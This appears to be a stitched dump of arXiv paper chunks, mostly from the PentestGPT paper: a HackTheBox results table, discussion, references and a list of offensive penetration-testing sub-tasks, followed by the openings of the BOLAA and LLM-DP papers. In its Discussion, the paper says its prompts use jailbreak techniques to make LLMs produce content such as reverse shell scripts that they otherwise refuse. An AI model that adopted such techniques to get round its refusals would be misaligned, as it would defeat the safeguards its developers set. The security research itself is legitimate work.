We demonstrate that PENTESTGPT exhibits practicality for real-world penetration testing beyond the crafted benchmark. For this purpose, we engage PENTESTGPT in the HackTheBox active machine challenges, a series of penetration testing objectives open to global testers.
TABLE 5: PENTESTGPT performance over the active HackTheBox challenges.

| Machine     | Difficulty | Completion | Completed Users | Cost (USD) |
|-------------|------------|------------|-----------------|------------|
| Sau         | Easy       |            | 4798            | 15.2       |
| Pilgrimage  | Easy       |            | 5474            | 12.6       |
| Topology    | Easy       |            | 4500            | 8.3        |
| PC          | Easy       |            | 6061            | 16.1       |
| MonitorsTwo | Easy       |            | 8684            | 9.2        |
| Authority   | Medium     |            | 1209            | 11.5       |
| Sandworm    | Medium     |            | 2106            | 10.2       |
| Jupiter     | Medium     |            | 1494            | 6.6        |
| Agile       | Medium     |            | 4395            | 22.5       |
| OnlyForYou  | Medium     |            | 2296            | 19.3       |
| Total       | -          | 6          | -               | 131.5      |
Each challenge consists of two components: a user flag, retrievable upon initial user access, and a root flag, obtainable after gaining root access. Our evaluation encompasses five targets of easy difficulty and five of medium difficulty. During this exercise, PENTESTGPT, utilizing GPT-4's 32k-token API, conducts up to five tests on each target. Success is defined solely by the capture of the root flag. Table 5 details the performance of PENTESTGPT in these challenges³. Ultimately, PENTESTGPT completes six of the ten challenges. The total expenditure for this exercise amounts to 131.5 USD, averaging 21.92 USD per completed target. This cost is markedly lower than employing human penetration testers and falls within an acceptable range. Our evaluation, therefore, underscores PENTESTGPT's capability to yield viable penetration testing results in real-world settings at an efficient cost, thereby highlighting its potential as a practical tool in the cybersecurity domain.

³ Completed Users denotes the number of users globally who have completed the target as of the manuscript submission time. Note that HackTheBox boasts over 670,000 active users.
# 7. Discussion
We recognize that penetration testing walkthroughs might have been part of the training material for the tested LLMs, potentially biasing the results. To mitigate this, we take two measures. First, we manually verify that the LLM does not have prior knowledge of the target machine; we do this by prompting the LLMs to state whether the tested machine is within their knowledge base. Second, we include penetration testing target machines released after 2021 in our benchmark, which fall outside the training data of the OpenAI models. The practicality study on the most recent HackTheBox challenges also demonstrates that PENTESTGPT can solve challenges without prior knowledge of the target.
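A lightweight version of this verification can be scripted. The sketch below assumes the 2023-era openai Python client with an API key in the environment; the probe wording is our own.

```python
import openai  # assumes the pre-1.0 client and OPENAI_API_KEY set in the environment

def knows_target(machine_name: str, model: str = "gpt-4") -> str:
    """Ask the model whether a target machine is within its knowledge base."""
    probe = (
        f"Do you have a walkthrough or any prior knowledge of the penetration "
        f"testing target machine '{machine_name}'? Answer yes or no, and "
        f"summarize anything you know about it."
    )
    resp = openai.ChatCompletion.create(
        model=model,
        messages=[{"role": "user", "content": probe}],
    )
    return resp["choices"][0]["message"]["content"]

print(knows_target("Hackable: II"))
```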
The rapidly evolving nature of LLMs and inconsistencies in the available APIs could invalidate PENTESTGPT's designed prompts. We strive to make the prompts general and suitable for various LLMs. However, due to their hacking nature, some LLMs resist generating specific penetration testing content, such as concrete reverse shell scripts. Our prompts therefore include jailbreak techniques [48] to guide the LLMs to generate penetration-testing-related information. How to generate reproducible outcomes is an important direction we are working towards.
We identify hallucination in Large Language Models [46], where the model's outputs diverge from its training data, as a significant challenge: it affects the reliability of our automatic penetration testing tool. We are actively exploring various techniques [49] to reduce hallucination and enhance our tool's performance. As an ongoing work, we believe such an attempt will lead to a more robust and effective automatic penetration testing tool.
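One direction we are experimenting with follows the sampling-based consistency idea behind SelfCheckGPT [49]: sample several answers to the same query and distrust content the model cannot reproduce. The word-overlap scoring below is our simplified stand-in for that paper's scoring functions.

```python
def consistency_score(samples):
    """Average word-set overlap of each sample against the rest.
    A low score means the samples disagree, a hallucination warning sign."""
    word_sets = [set(s.lower().split()) for s in samples]
    scores = []
    for i, words in enumerate(word_sets):
        others = set().union(*(word_sets[:i] + word_sets[i + 1:]))
        scores.append(len(words & others) / max(len(words), 1))
    return sum(scores) / len(scores)

samples = [
    "Port 21 runs vsftpd 3.0.3 with anonymous login enabled.",
    "Port 21 runs vsftpd 3.0.3; anonymous login is enabled.",
    "Port 21 runs ProFTPD 1.3.5 with no anonymous access.",  # the odd one out
]
print(round(consistency_score(samples), 2))
```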
# 8. Conclusion
In this work, we explore the capabilities and limitations of Large Language Models (LLMs) in the context of penetration testing. By developing and implementing a novel benchmark, we provide critical insights into how LLMs perform in this intricate domain. We find that LLMs handle fundamental penetration testing tasks and utilize testing tools competently, but they also suffer from the context loss and attention issues inherent to their design.
Building on these findings, we introduce PENTESTGPT, a specialized tool that simulates human-like behavior in penetration testing. Drawing inspiration from the structure of real-world penetration testing teams, PENTESTGPT features Reasoning, Generation, and Parsing Modules. This design enables a divide-and-conquer approach to problem-solving. Our thorough evaluation of PENTESTGPT reveals its potential and highlights areas where human expertise continues to outpace current technology. Overall, the contributions of this study serve as a valuable resource and offer a promising direction for continued research and development in the essential field of cybersecurity.
# References
[1] A. Applebaum, D. Miller, B. Strom, H. Foster, and C. Thomas, "Analysis of automated adversary emulation techniques," in Proceedings of the Summer Simulation Multi-Conference. Society for Computer Simulation International, 2017, p. 16.
[2] B. Arkin, S. Stender, and G. McGraw, "Software penetration testing," IEEE Security & Privacy, vol. 3, no. 1, pp. 84–87, 2005.
[3] G. Deng, Z. Zhang, Y. Li, Y. Liu, T. Zhang, Y. Liu, G. Yu, and D. Wang, "Nautilus: Automated RESTful API vulnerability detection."
[4] W. X. Zhao, K. Zhou, J. Li, T. Tang, X. Wang, Y. Hou, Y. Min, B. Zhang, J. Zhang, Z. Dong et al., "A survey of large language models," arXiv preprint arXiv:2303.18223, 2023.
[5] Y. Liu, T. Han, S. Ma, J. Zhang, Y. Yang, J. Tian, H. He, A. Li, M. He, Z. Liu et al., "Summary of ChatGPT/GPT-4 research and perspective towards the future of large language models," arXiv preprint arXiv:2304.01852, 2023.
[6] J. Wei, Y. Tay, R. Bommasani, C. Raffel, B. Zoph, S. Borgeaud, D. Yogatama, M. Bosma, D. Zhou, D. Metzler et al., "Emergent abilities of large language models," arXiv preprint arXiv:2206.07682, 2022.
[7] N. Antunes and M. Vieira, "Benchmarking vulnerability detection tools for web services," in 2010 IEEE International Conference on Web Services.
[8] P. Xiong and L. Peyton, "A model-driven penetration test framework for web applications," in 2010 Eighth International Conference on Privacy, Security and Trust.
[9] "HackTheBox: Hacking training for the best." [Online]. Available: http://www.hackthebox.com/
[10] [Online]. Available: https://www.vulnhub.com/
[11] "OWASP Foundation," https://owasp.org/.
[12] "Models - OpenAI API," https://platform.openai.com/docs/models/, (Accessed on 02/02/2023).
[13] "GPT-4," https://openai.com/research/gpt-4, (Accessed on 06/30/2023).
[14] Google, "Bard," https://bard.google.com/?hl=en.
[15] Rapid7, "Metasploit framework," 2023, accessed: 30-07-2023. [Online]. Available: https://www.metasploit.com/
[16] S. Mauw and M. Oostdijk, "Foundations of attack trees," vol. 3935, Jul. 2006, pp. 186–198.
[17] [Online]. Available: https://app.hackthebox.com/machines/list/active
[18] "Automated penetration testing," https://anonymous.4open.science/r/EXCALIBUR-Automated-Penetration-Testing/README.md, 2023.
[19] G. Weidman, Penetration Testing: A Hands-on Introduction to Hacking. No Starch Press, 2014.
[20] F. Abu-Dabaseh and E. Alshammari, "Automated penetration testing: An overview," in The 4th International Conference on Natural Language Computing, Copenhagen, Denmark, 2018, pp. 121–129.
[21] J. Schwartz and H. Kurniawati, "Autonomous penetration testing using reinforcement learning," arXiv preprint arXiv:1905.05965, 2019.
[22] H. Pearce, B. Ahmad, B. Tan, B. Dolan-Gavitt, and R. Karri, "Asleep at the keyboard? Assessing the security of GitHub Copilot's code contributions," in 2022 IEEE Symposium on Security and Privacy (SP).
[23] H. Pearce, B. Tan, B. Ahmad, R. Karri, and B. Dolan-Gavitt, "Examining zero-shot vulnerability repair with large language models," in 2023 IEEE Symposium on Security and Privacy (SP). IEEE, 2023, pp. 2339–2356.
[24] "OWASP Juice Shop Project," https://owasp.org/www-project-juice-shop/, 2022.
[25] [Online]. Available: https://nmap.org/
[26] MITRE, "Common Weakness Enumeration (CWE)," https://cwe.mitre.org/index.html, 2021.
[27] E. Collins, "LaMDA: Our breakthrough conversation technology," May 2021. [Online]. Available: https://blog.google/technology/ai/lamda/
[28] "New chat," https://chat.openai.com/, (Accessed on 02/02/2023).
[29] "The most advanced penetration testing distribution." [Online]. Available: https://www.kali.org/
[30] S. Inc., "Nexus vulnerability scanner." [Online]. Available: https://www.sonatype.com/products/vulnerability-scanner-upload
[31] S. Rahalkar and S. Rahalkar, "OpenVAS," Quick Start Guide to Penetration Testing: With NMAP, OpenVAS and Metasploit, pp. 47–71, 2019.
[32] B. Guimaraes and M. Stampar, "sqlmap: Automatic SQL injection and database takeover tool," https://sqlmap.org/, 2022.
[33] J. Yeo, "Using penetration testing to enhance your company's security," Computer Fraud & Security, vol. 2013, no. 4, pp. 17–20, 2013.
[34] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. N. Gomez, L. Kaiser, and I. Polosukhin, "Attention is all you need," 2023.
[35] Y. Bang, S. Cahyawijaya, N. Lee, W. Dai, D. Su, B. Wilie, H. Lovenia, Z. Ji, T. Yu, W. Chung et al., "A multitask, multilingual, multimodal evaluation of ChatGPT on reasoning, hallucination, and interactivity," arXiv preprint arXiv:2302.04023, 2023.
[36] J. Wei, X. Wang, D. Schuurmans, M. Bosma, B. Ichter, F. Xia, E. Chi, Q. Le, and D. Zhou, "Chain-of-thought prompting elicits reasoning in large language models," 2023.
[37] H. S. Lallie, K. Debattista, and J. Bal, "A review of attack graph and attack tree visual syntax in cyber security," Computer Science Review, vol. 35, p. 100219, 2020. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S1574013719300772
[38] K. Barbar, "Attributed tree grammars," Theoretical Computer Science, vol. 119, no. 1, pp. 3–22, 1993. [Online]. Available: https://www.sciencedirect.com/science/article/pii/030439759390337S
[39] H. Sun, X. Li, Y. Xu, Y. Homma, Q. Cao, M. Wu, J. Jiao, and D. Charles, "AutoHint: Automatic prompt optimization with hint generation," 2023.
[40] Sep. 2018. [Online]. Available: https://forum.hackthebox.com/t/carrier/963
[41] "Nikto web server scanner." [Online]. Available: https://github.com/sullo/nikto
[42] [Online]. Available: https://openai.com/blog/chatgpt-plugins#code-interpreter
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 83 | [42] [Online]. Available: https://openai.com/blog/chatgpt-plugins#code-interpreter
[43] "Dirbuster: a multi threaded java application designed to brute force directories and files names on web/application servers." [Online]. Available: https://github.com/KajanM/DirBuster
[44] J. Wang, X. Yi, R. Guo, H. Jin, P. Xu, S. Li, X. Wang, X. Guo, C. Li, X. Xu et al., "Milvus: A purpose-built vector data management system," in Proceedings of the 2021 International Conference on Management of Data, 2021, pp. 2614-2627.
[45] R. Guo, X. Luan, L. Xiang, X. Yan, X. Yi, J. Luo, Q. Cheng, W. Xu, J. Luo, F. Liu et al., "Manu: a cloud native vector database management system," Proceedings of the VLDB Endowment, vol. 15, no. 12, pp. 3548-3561, 2022.
[46] M. Zhang, O. Press, W. Merrill, A. Liu, and N. A. Smith, "How language model hallucinations can snowball," arXiv preprint arXiv:2305.13534, 2023. | 2308.06782#83 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 84 | [47] [Online]. Available: https://www.vulnhub.com/entry/hackable-ii,711/ [48] Y. Liu, G. Deng, Z. Xu, Y. Li, Y. Zheng, Y. Zhang, L. Zhao, T. Zhang, and Y. Liu, "Jailbreaking chatgpt via prompt engineering: An empirical study," arXiv preprint arXiv:2305.13860, 2023. [49] P. Manakul, A. Liusie, and M. J. Gales, "Selfcheckgpt: Zero-resource black-box hallucination detection for generative large language models," arXiv preprint arXiv:2303.08896, 2023.
TABLE 6: Summarized 26 types of sub-tasks in the proposed penetration testing benchmark. | 2308.06782#84 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
Description:
- Utilize various security tools for scanning, probing, and analyzing vulnerabilities in the target system.
- Identify the open ports and related information on the target machine.
- Gather detailed information about the target's web applications, including directory structure, available services, and underlying technologies.
- Review the target's source code to find vulnerabilities that may lead to unauthorized access or other malicious activities.
- Craft and utilize shell codes to manipulate the target system, often enabling control or extraction of data.
- Traverse and manipulate directories to discover sensitive files, misconfigurations, or hidden information on the target system.
- Identify and exploit weaknesses in permissions to gain higher-level access to systems or data.
- Locate and retrieve specific data markers ("flags") often used in Capture The Flag (CTF) challenges to prove that a system was successfully penetrated.
- Utilize tools and techniques to decipher or crack passwords and cryptographic hash values for unauthorized authentication.
- Identify and exploit vulnerabilities within the network infrastructure to gain unauthorized access or disrupt services.
- Inject arbitrary commands to be run on a host machine, often leading to unauthorized system control.
- Manipulate user access controls to escalate privileges or gain | 2308.06782#85 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
- Inject arbitrary commands to be run on a host machine, often leading to unauthorized system control.
- Manipulate user access controls to escalate privileges or gain unauthorized access to resources.
- Locate and extract authentication credentials such as usernames and passwords within the system.
- Exploit vulnerabilities in FTP (File Transfer Protocol) services to gain unauthorized access, file manipulation, or data extraction.
- Analyze and manipulate scheduled tasks (cron jobs) to execute unauthorized commands or disrupt normal operations.
- Exploit SQL (Structured Query Language) vulnerabilities like SQL injection to manipulate databases and extract sensitive information.
- Target Windows-based networks to exploit domain-level vulnerabilities, often gaining widespread unauthorized access.
- Exploit insecure deserialization processes to execute arbitrary code or manipulate object data.
- Repeatedly try different authentication credentials to gain unauthorized access to systems or data.
- Inject malicious scripts into web pages viewed by others, allowing for unauthorized access or data theft.
- Utilize or create exploits targeting PHP applications, leading to unauthorized access or code execution.
- Create and utilize custom-crafted passwords based on gathered information, aiding in | 2308.06782#86 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
exploits targeting PHP applications, leading to unauthorized access or code execution.
- Create and utilize custom-crafted passwords based on gathered information, aiding in unauthorized access attempts.
- Exploit vulnerabilities in XML parsers to perform unauthorized reading of data, denial of service, or execute remote requests.
- Target SSH (Secure Shell) services to gain unauthorized access or command execution on remote systems.
- Research known vulnerabilities in the Common Vulnerabilities and Exposures (CVE) database to understand and potentially exploit weaknesses in target systems.
- Other engagements in additional exploratory testing and other methods to uncover vulnerabilities not identified by standard procedures. | 2308.06782#87 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
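The three Table 6 records above flatten the Description column of the benchmark's 26 sub-task types. As a minimal illustration of how such a taxonomy can be used to score a tester or tool, the sketch below tallies per-category completion rates; the category names and data layout are illustrative assumptions, not the paper's exact labels.

```python
from collections import Counter
from dataclasses import dataclass

@dataclass(frozen=True)
class SubTask:
    """One benchmark sub-task instance: a Table 6 category plus a completion flag."""
    category: str   # illustrative names below; the paper defines 26 such categories
    completed: bool

def completion_rates(subtasks):
    """Fraction of completed sub-tasks per category."""
    total, done = Counter(), Counter()
    for t in subtasks:
        total[t.category] += 1
        done[t.category] += int(t.completed)
    return {c: done[c] / total[c] for c in total}

if __name__ == "__main__":
    run = [  # hypothetical category labels, not the paper's exact wording
        SubTask("Port Scanning", True),
        SubTask("Command Injection", False),
        SubTask("Privilege Escalation", True),
        SubTask("Privilege Escalation", False),
    ]
    print(completion_rates(run))
    # {'Port Scanning': 1.0, 'Command Injection': 0.0, 'Privilege Escalation': 0.5}
```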
2308.05960 | 0 | arXiv:2308.05960v1 [cs.AI] 11 Aug 2023
# BOLAA: BENCHMARKING AND ORCHESTRATING LLM-AUGMENTED AUTONOMOUS AGENTS
Zhiwei Liu†⋆, Weiran Yao†, Jianguo Zhang†, Le Xue†, Shelby Heinecke†, Rithesh Murthy†, Yihao Feng†, Zeyuan Chen†, Juan Carlos Niebles†, Devansh Arpit†, Ran Xu†, Phil Mui‡, Huan Wang†◦, Caiming Xiong†◦, Silvio Savarese†◦
# †Salesforce Research, USA ‡CTO Office, Salesforce, USA ◦Corresponding Authors: {huan.wang, cxiong, ssavarese}@salesforce.com
# ABSTRACT | 2308.05960#0 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
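The BOLAA record above describes its key architectural idea: multiple labor agents, each specialised in one action type, coordinated by a controller that manages their communication. The sketch below is a minimal illustration of that orchestration pattern, assuming hypothetical click/search agents and a trivial keyword router in place of the LLM-driven selection; the released code at the GitHub URL above is the authoritative implementation.

```python
from typing import Callable, List

class ClickAgent:
    """Hypothetical labor agent specialised in click actions."""
    name = "click"
    def act(self, task: str, observation: str) -> str:
        return f"click[{observation.split()[0]}]"  # toy policy: click the first visible element

class SearchAgent:
    """Hypothetical labor agent specialised in search actions."""
    name = "search"
    def act(self, task: str, observation: str) -> str:
        return f"search[{task}]"

class Controller:
    """Routes each step to one labor agent and relays its action to the environment."""
    def __init__(self, agents: List, select: Callable[[str, str], str]):
        self.agents = {a.name: a for a in agents}
        self.select = select

    def step(self, task: str, observation: str) -> str:
        choice = self.select(task, observation)  # in BOLAA this selection is made by the controller
        return self.agents[choice].act(task, observation)

def keyword_router(task: str, observation: str) -> str:
    """Trivial stand-in for the LLM-driven agent selection."""
    return "click" if "button" in observation else "search"

controller = Controller([ClickAgent(), SearchAgent()], keyword_router)
print(controller.step("buy a red shirt", "button: Add to Cart"))   # click[button:]
print(controller.step("buy a red shirt", "search results empty"))  # search[buy a red shirt]
```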
2308.06391 | 0 | arXiv:2308.06391v1 [cs.CL] 11 Aug 2023
# Dynamic Planning with a LLM
# Gautier Dagan, Frank Keller, Alex Lascarides
# School of Informatics, University of Edinburgh, UK
# [email protected], {keller, alex}@inf.ed.ac.uk
# Abstract
While Large Language Models (LLMs) can solve many NLP tasks in zero-shot settings, applications involving embodied agents remain problematic. In particular, complex plans that require multi-step reasoning become difficult and too costly as the context window grows. Planning requires understanding the likely effects of one's actions and identifying whether the current environment satisfies the goal state. While symbolic planners find optimal solutions quickly, they require a complete and accurate representation of the planning problem, severely limiting their use in practical scenarios. In contrast, modern LLMs cope with noisy observations and high levels of uncertainty when reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a neuro-symbolic framework where an LLM works hand-in-hand with a traditional planner to solve an embodied task. Given action-descriptions, LLM-DP solves Alfworld faster and more efficiently than a naive LLM ReAct baseline.
# 1 Introduction | 2308.06391#0 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
